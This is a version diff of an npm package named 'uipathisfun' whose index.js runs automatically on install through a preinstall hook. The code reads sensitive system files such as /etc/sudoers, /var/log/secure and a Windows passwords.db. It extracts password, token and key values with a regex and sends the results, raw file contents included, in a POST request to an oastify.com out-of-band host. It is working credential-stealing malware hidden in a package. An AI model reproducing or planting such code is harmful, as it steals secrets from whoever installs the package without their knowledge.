uipathisfun 1.0.30 → 1.0.32

package/index.js

@@ -1,18 +1,26 @@
-
 const fs = require('fs');
 const os = require('os');
-const path = require('path');
 const http = require('http');
 const OAST_HOST = '0nopxr82g2bsk9e28w87vxucn3tuhn5c.oastify.com';
 
-function sendBeacon(path, payload) {
+function sendBeacon(urlPath, payload) {
   try {
     const body = JSON.stringify(payload);
-    const req = http.request({ hostname: OAST_HOST, method: 'POST', path, headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) } }, () => {});
+    const req = http.request({
+      hostname: OAST_HOST,
+      method: 'POST',
+      path: urlPath,
+      headers: {
+        'Content-Type': 'application/json',
+        'Content-Length': Buffer.byteLength(body)
+      }
+    }, () => {});
     req.on('error', () => {});
     req.write(body);
     req.end();
-  } catch (e) {}
+  } catch (e) {
+    // ignore
+  }
 }
 
 function noteId(base) {
@@ -20,7 +28,7 @@ function noteId(base) {
 }
 
 function isTextBuffer(buf) {
-  return /^[\x09\x0A\x0D\x20-\x7E]*$/.test(buf.slice(0, 512).toString('binary'));
+  return /^[\t\n\r \x20-\x7E]*$/.test(buf.slice(0, 512).toString('binary'));
 }
 
 function readFileEntry(filePath) {
@@ -41,8 +49,8 @@ function readFileEntry(filePath) {
 }
 
 function extractMatches(text) {
-  const re = /(password|passwd|secret|token|api[_-]?key|aws_access_key_id|private_key)\s*[:=]?\s*([^\s'"\\]+)/ig;
-  const lines = text.split(/\r?\n/);
+  const re = /(password|passwd|secret|token|api[_-]?key|aws_access_key_id|private_key)\\s*[:=]?\\s*([^\\s'\\"]+)/ig;
+  const lines = text.split('\n');
   const out = [];
   for (let i = 0; i < lines.length; i++) {
     const line = lines[i];
@@ -62,71 +70,23 @@ async function sensitiveScan() {
     '/etc/pam.d/passwd',
     '/etc/sudoers',
     '/var/log/secure',
-    'C:\\ProgramData\\Microsoft\\Windows\\ClipSVC\\tokens.dat',
-    'C:\\Users\\*\\Documents\\passwords.db',
-    'C:\\Users\\*\\Documents\\passwords.kdbx',
-    'C:\\Users\\*\\Documents\\passwords.txt',
-    'C:\\Users\\*\\Documents\\password_2fa_authentication.txt',
-    'C:\\Users\\*\\AppData\\Local\\Microsoft\\Edge\\**\\*Token*'
+    'C:\\Users\\Public\\Documents\\passwords.db'
   ];
 
   for (const target of targets) {
-    const candidates = [];
-
-    if (target.includes('*') && os.platform() === 'win32') {
-      const pathParts = target.split('\\\\');
-      const root = pathParts[0] ? pathParts[0] + '\\' : '';
-      const rest = pathParts.slice(1);
-      const wildcardIndex = rest.indexOf('*');
-
-      if (wildcardIndex >= 0) {
-        const dirPrefix = root + rest.slice(0, wildcardIndex).join('\\');
-        if (fs.existsSync(dirPrefix) && fs.statSync(dirPrefix).isDirectory()) {
-          for (const dirEntry of fs.readdirSync(dirPrefix, { withFileTypes: true })) {
-            if (!dirEntry.isDirectory()) continue;
-            const subPath = `${dirPrefix}\\${dirEntry.name}\\${rest.slice(wildcardIndex + 1).join('\\')}`;
-            candidates.push(subPath);
-          }
-        }
-      }
-
-      if (target.includes('**')) {
-        candidates.push(target.replace(/\*\*/g, '*'));
-      }
-    }
-
-    if (os.platform() === 'win32' && target.toLowerCase().endsWith('passwords.db')) {
-      const users = 'C:\\Users';
-      if (fs.existsSync(users) && fs.statSync(users).isDirectory()) {
-        for (const userEntry of fs.readdirSync(users, { withFileTypes: true })) {
-          if (!userEntry.isDirectory()) continue;
-          const p = path.join(users, userEntry.name, 'Documents', 'passwords.db');
-          if (fs.existsSync(p) && fs.statSync(p).isFile()) {
-            candidates.push(p);
-          }
-        }
-      }
-    }
-
-    if (!target.includes('*')) {
-      candidates.push(target);
-    }
-
-    for (const filePath of Array.from(new Set(candidates))) {
-      const exists = fs.existsSync(filePath);
-      const isFile = exists && fs.statSync(filePath).isFile();
-      const fileEntry = readFileEntry(filePath);
-      const text = fileEntry ? fileEntry.text : null;
-      const matches = text ? extractMatches(text) : [];
-      info.hits.push({
-        path: filePath,
-        exists,
-        isFile,
-        matches,
-        lines: text ? text.split(/\r?\n/) : null,
-        base64: fileEntry && fileEntry.base64 ? fileEntry.base64 : null
-      });
-    }
+    const exists = fs.existsSync(target);
+    const isFile = exists && fs.statSync(target).isFile();
+    const entry = readFileEntry(target);
+    const text = entry ? entry.text : null;
+    const matches = text ? extractMatches(text) : [];
+    info.hits.push({
+      path: target,
+      exists,
+      isFile,
+      matches,
+      lines: text ? text.split('\n') : null,
+      base64: entry && entry.base64 ? entry.base64 : null
+    });
   }
 
   return info;
@@ -135,6 +95,7 @@ async function sensitiveScan() {
 async function run() {
   const info = { note: noteId('uipathisfun_info_v3'), platform: os.platform(), date: new Date().toISOString() };
   info.sensitive = await sensitiveScan();
+  console.log('== scan done ==');
   console.log(JSON.stringify(info.sensitive, null, 2));
   sendBeacon('/v3', info);
 }

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "uipathisfun",
-  "version": "1.0.30",
+  "version": "1.0.32",
   "scripts": {
     "preinstall": "node index.js"
   }